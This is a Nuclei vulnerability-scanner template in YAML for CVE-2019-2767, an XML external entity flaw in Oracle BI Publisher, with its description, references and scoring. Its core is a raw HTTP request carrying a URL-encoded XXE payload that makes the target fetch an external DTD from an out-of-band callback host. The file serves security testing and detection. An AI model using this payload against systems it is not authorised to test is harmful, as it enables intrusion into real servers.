nuclei-templates/http/cves/2019/CVE-2019-2767.yaml

40 lines
1.7 KiB
YAML

id: CVE-2019-2767
info:
name: Oracle Business Intelligence Publisher - XML External Entity Injection
author: madrobot
severity: high
description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
remediation: |
Apply the latest security patches provided by Oracle to fix this vulnerability.
reference:
- https://www.exploit-db.com/exploits/46729
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2019-2767
epss-score: 0.14972
epss-percentile: 0.95269
cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: oracle
product: bi_publisher
tags: edb,cve,cve2019,oracle,xxe,oast
http:
- raw:
- |
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 490a0046304402203dc32701d2adfef496e0fc19dbaba2a64c246114159604a8674c47f1e3cc167802207ce5cf95d60a77155819c194abd9d63267da7691231c32fb4b7cf1993b2b692e:922c64590222798bb761d5b6d8e72950